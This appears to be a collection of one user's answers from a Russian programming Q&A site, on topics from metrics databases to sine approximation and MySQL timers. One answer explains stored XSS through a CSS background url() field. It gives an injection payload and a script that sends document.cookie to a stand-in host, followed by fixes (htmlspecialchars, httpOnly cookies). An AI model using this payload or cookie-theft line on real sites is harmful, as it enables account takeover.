d'Ivan

Так этож метрики. Influxdb, Prometeus, ClickHouse и тп

- Подымать в качестве гантели
- Сидеть
- Забивать гвозди
- Использовать в качестве груза при квашении капусты
- поставить Windows 2000 и ностальгически поигрывать в игры времен начала нулевых

На что-либо хоть на копеечку серьезное он уже ну никак...

Штатно никак. Для таких случаев перенаправляйте вывод в файл

в добавок к этому у меня устойчивое ощущение, что Си/С++ - языки для "тру девелоперов", и вообще писать на них очень круто.

Пожалуй, да, так было лет 20 назад.
Просто потому что альтернатив-то особо и не было.

Сейчас "тру девелоперы" могут использовать как Go, так и Rust, так и С++, так и уже развитый C#, Java и т.п. и т.д.

XSS это эксплуатация уязвимостей в HTML, JS и других скриптах.

3. Указывайте кодировку на каждой веб-странице.

Кодировку нужно указывать, так как некоторые браузеры могут её неправильно определить и текстовой контент на сайте станет нечитаемым.

В случае если тег расположен до тега и заполняется пользовательскими данными

Нужно фильтровать пользовательские данные, в том числе, когда они встраиваются в HTML разметку.
Например, вы разрешаете пользователям изменять фоновую картинку в своём профиле.
У вас есть текстовое поле, в которое пользователь вводит ссылку на картинку. После этого вы подставляете картинку пользователя, например из базы данных в переменную $user_background.
Таким образом, код на странице пользователя, выглядит как-то так:

<body style="background: #282b31 url($user_background) 50% 0 repeat;">
...
</body>

Пользователь вставляет свою ссылку example.com/image.png и в коде страницы, это выглядит так:

<body style="background: #282b31 url(http://example.com/image.png) 50% 0 repeat;">
...
</body>

Казалось-бы, что здесь не так. Если пользователь вставит сюда что-нибудь кроме картинки, то ничего не будет, по правилам CSS, зачем что-то фильтровать или... нет.
Предположим, школохацкер вставит вместо картинки какой-нибудь тег:
<script>alert('Мамку админа ипал!!111');</script>
В таком случае, как правило, ничего не произойдёт, но может съехать вёрстка, что уже признак уязвимости. Дальше у нашего хакира бомбанёт пупкан и он попросит помощи у старшего брата из группировки Онанимусов. Добрый братик изменит эту строчку так, чтобы превратить её в активную XSS уязвимость ( правильно говорить "раскрутит" её ).
На этом этапе строчка будет выглядеть как-то так:

http://example.com/image.png') 50% 0 repeat;"><script>alert('Мамку админа ипал!!111');</script><input type="hidden" style="background: #282b31 url(

Она не только радостно поприветствует алертом каждого, кто зайдёт на эту страницу, но ещё и установит картинку и не испортит вёрстку сайта, да ещё и к тому же не нарушит правил CSS. Итак, это и есть XSS уязвимость.
Они к слову, бывают нескольких видов. Активные и пассивные.
Чтобы расширить свой кругозор в области XSS, рекоммендую прочесть старый как помёт мамонта, мануал на форуме Antichat: forum.antichat.ru/threads/20140/ ( странно, ссылка вырезается, не уж то Ачат на Тостере под запретом? ).

Что тут происходит?!
Из-за отсутствия фильтрации текст из поля, сохраняется в БД в первоначальном виде. Как только он попадает на страницу, начинается самое интересное ^_^.
Сначала код устанавливает картинку на фон, потом благополучно закрывает этот тег. После этого идёт "пейлоад", то есть JS код, например. С таким же успехом, можно запихнуть туда, например тег test или кучу ссылок на продажу виагры с анкорами, тем самым подняв некоторые показатели, например, индекс цитируемости (ТИЦ) для своих ссылок. После этого мы создаём новый тег input, делаем его скрытым и тем самым закрываем тег ( по стандартам html, этот элемент не нуждается в закрывающемся теге ). Уязвимость готова.

Что ещё?
Ну если вам этого недостаточно то можно "выипать админа" с помощью соц. инженерии и... той самой XSS. Для этого достаточно лишь поменять код JS на что-то вроде:

<script>$.get('http://example.com/adminlox.php?sniffer=' + document.cookie);</script>

и если у нубоадмина нет httponly у куков, то можно получить данные админа и войти под его аккаунтом или даже попасть в админку сайта. Дальше можно кое-что залить, но это уже совсем другая история... :3

Как фиксить?
Как минимум в этом конкретном случае, обернуть PHP переменную $user_background в

htmlspecialchars($user_background, ENT_QUOTES, 'UTF-8');

таким образом, код, показанный выше уже работать не будет. Дальше нужно установить httponly у сессионных Cookie (если ещё не стоит), для этого нужно заменить вашу конструкцию, на что-то вроде этого:
header( "Set-Cookie: name=value; httpOnly" );
или так

setcookie('Foo','Bar',0,'/', 'www.sample.com'  , FALSE, TRUE);

ну и вообще, перед тем как что-то писать, лучше прочтите хотя-бы одну книгу по PHP7.x, JS ec6, HTML5,CSS3. Я сам их не читал, поэтому это можете спросить здесь, новым вопросом. Здесь есть ребята, которые могут подсказать действительно годную и современную литературу.
Удачи вам, в познании XSS.

Никак, в UTF динамический размер символа, поэтому вы не сможете спозиционироваться на нужный символ не прочитав предыдущие. Соответственно если будет не равнозначная замена по количеству байт, то вам в любом случае придётся раздвигать, а это потребует полного считывания файла. В общем, если этот ТХТ файл не гигабайтного размера я бы не стал заморачиваться, читал целиком, заменял и записывал обратно.

Язык программирования для 40летнего начинающего?

Не умеют настраивать линукс и постгрес
Имеют % с продаж продуктов МС
Переживаете не зря
Если у вас есть понимание зачем вам постгрес - вам нужно настоять на своем решении

Ах да, их отказ может быть свзяан вообще с другими причинами - потому спрашивайте у них "почему"

Смотря какая точность нужна. Есть формула Бхаскара, работающая на диапазоне от 0° до 180° (0-π):
sin(x°) = 4·x·(180−x)/(40500−x·(180−x))
sin(x) = 16·x·(π−x)/(5·π²−4·x·(π−x))
На большей части диапазона она даёт точность в пределах 0.2%, на краях точность падает до 2%.
Значения для углов вне этого диапазона можно получить из тождества:
sin(2·π+x) = sin(x)
sin(π+x) = -sin(x)

Как мне кажется из каменного века. Создать отдельное поле, в которое я сохраняю точное время инициации действия. В тот момент когда мне надо показать пользователю поле "account" я показываю account + ( (дата инициации дейтсивя обновления поля accoutn) - (дата отображения поля) )*(нужный параметр добавления)

"Долбить" базу каждую секунду, без особой на то нужды, когда можно этого не делать - плохая идея. Данное решение описывает более рациональный подход, если он конечно возможен.

Писать сторонний микросервис, который будет отправлять каждую секунду запросы в БД и увеличивать значение.

Не знаю, что Вы подразумеваете под "сторонним микросервисом" и как это в конечном итоге должно работать (логически), например при нагрузке, запросы могут вставать в очередь и данные могут терять свою актуальность в этом (вашем) случае... Можете попробовать несколько вариантов:

1. Попробовать использовать "родные" события MySQL

2. Создать примитивный скрипт PHP, типа такого и запустить его (на бесконечное выполнение):

<?php
while(true) {
mysql_query("..."); //Условно
sleep(1);
}

но, он будет выполняться не 1 раз в секунду, а с паузой в 1 секунду

3. Загадить крон заданиями, в кол-ве около 60 штук (т.к. крон задания запускаются минимум 1 раз в минуту), как это примерно должно выглядеть описано здесь, что в целом тоже не очень надёжно, т.к. высока вероятность, что рано или поздно, запросы могут отвалиться, приводя тем самым самым данные в неактуальное состояние.

Это какой-то дурацкий сленг. Видимо, кто-то попытался отправить на сервер HTTP-запрос с помощью curl`а и у него не получилось.

google://bash dirname и т.д.

Докучи - выучить синтаксис шарпа - это одно. Научится на нем программировать - другое. Научится ИСПОЛЬЗУЯ c# работать в Unity - совершенно третье. На каждой итерации сильно меняются задачи и нужен совсем другой объем знаний. Чтобы работать в юнити - надо помимо языка знать еще хотя бы алгоритмы, структуры данных, графику, архитектурные подходы.

Поэтому совет - не учите c#. Учитесь программировать! Язык тут не важен.